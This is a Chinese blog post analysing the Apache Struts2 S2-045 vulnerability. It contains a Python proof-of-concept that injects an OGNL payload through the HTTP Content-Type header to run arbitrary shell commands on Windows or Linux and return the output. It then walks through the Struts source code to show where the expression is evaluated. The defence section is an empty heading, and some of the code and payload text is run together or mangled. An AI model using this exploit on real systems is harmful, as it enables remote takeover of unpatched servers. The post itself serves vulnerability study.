0x01 前言
官方给的漏洞公告在这里 https://cwiki.apache.org/confluence/display/WW/S2-045
受影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 -Struts 2.5.10
其实昨天就看到朋友圈有人在发这个漏洞,一看是s2-045,心想着struts2的问题可真多,编号都排到45了,就像道哥说的一样如果一个软件出现的漏洞较多,那么说明代码维护者的安全意识与安全经验有所欠缺,同时由于破窗效应,这个软件未来往往出现更多的漏洞,struts2确实让人不太省心,然后当时也给自己一个做j2ee开发的朋友说s2又爆出了一个漏洞,他还不在乎的说谁现在还用struts2啊,我们现在都用SpringMVC了,但是自己测试了几个大型的网站,还是受到了s2-045漏洞的影响,仔细想想的确现在开发j2ee struts2框架的很少了,但是一些网站的老系统之前都是用的s2框架,而这些可能又是和他们业务息息相关的,一时的完全替代成本太高,所以基本是就是“修修补补又三年”的状态。
0x02 poc分析
#! /usr/bin/env python#encoding:utf-8
importurllib2importsysfrom poster.encode importmultipart_encodefrom poster.streaminghttp importregister_openersdefpoc():
datagen, header= multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"header["Content-Type"]="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+sys.argv[2]+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"request= urllib2.Request(str(sys.argv[1]),datagen,headers=header)
从poc和wireshark中可以看到,恶意的payload是以http header中的Content-type为载体的,最终导致ognl表达式的命令执行的目的。这个poc的ognl表达式和之前的s2-032不同,还是颇有讲究的,对win和linux做了兼容性处理。
0x03 漏洞分析
public staticString findText(Class aClass, String aTextName, Locale locale, String defaultMessage, Object[] args) {
ValueStack valueStack=ActionContext.getContext().getValueStack();returnfindText(aClass, aTextName, locale, defaultMessage, args, valueStack);
}/*** Finds a localized text message for the given key, aTextName. Both the key and the message
* itself is evaluated as required. The following algorithm is used to find the requested
* message:
Look for message in aClass' class hierarchy.*
Look for the message in a resource bundle for aClass*
If not found, look for the message in a resource bundle for any implemented interface*
If not found, traverse up the Class' hierarchy and repeat from the first sub-step*
If not found and aClass is a {@linkModelDriven} Action, then look for message in* the model's class hierarchy (repeat sub-steps listed above).
If not found, look for message in child property. This is determined by evaluating* the message key as an OGNL expression. For example, if the key is
* user.address.state, then it will attempt to see if "user" can be resolved into an
* object. If so, repeat the entire process fromthe beginning with the object's class as
* aClass and "address.state" as the message key.
If not found, look for the message in aClass' package hierarchy.*
If still not found, look for the message in the default resource bundles.*
Return defaultMessage*
* When looking for the message, if the key indexes a collection (e.g. user.phone[0]) and a
* message for that specific key cannot be found, the general form will also be looked up
* (i.e. user.phone[*]).
* If a message is found, it will also be interpolated. Anything within ${...}
* will be treated as an OGNL expression and evaluated as such.
* If a message is not found a WARN log will be logged.
*@paramaClass the class whose name to use as the start point for the search
*@paramaTextName the key to find the text message for
*@paramlocale the locale the message should be for
*@paramdefaultMessage the message to be returned if no text message can be found in any
* resource bundle
*@paramvalueStack the value stack to use to evaluate expressions instead of the
* one in the ActionContext ThreadLocal
*@returnthe localized text, or null if none can be found and no defaultMessage is provided*/
大致的意思是通过给定的key和aTextname找到本地化的text message,关键点在key这个参数会进行ognl表达式的执行。不断跟进代码,我们最终发现了ognl表达式和我们的payload是在LocalizedTextUtil类的getDefaultMessage()这个函数里面最终执行的。
可见漏洞产生的关键点是在处理 error message产生了问题,message拼接了用户的“输入”,而这个message参数会传递到transalteVariables()这个函数,这个函数的定义如下:
/*** Converted object from variable translation.
*@returnConverted object from variable translation.*/
public static Object translateVariables(char[] openChars, String expression, final ValueStack stack, final Class asType, final ParsedValueEvaluator evaluator, intmaxLoopCount) {
ParsedValueEvaluator ognlEval= newParsedValueEvaluator() {publicObject evaluate(String parsedValue) {
Object o=stack.findValue(parsedValue, asType);if (evaluator != null && o != null) {
0x04 小结
0x05 防御
0x06 Reference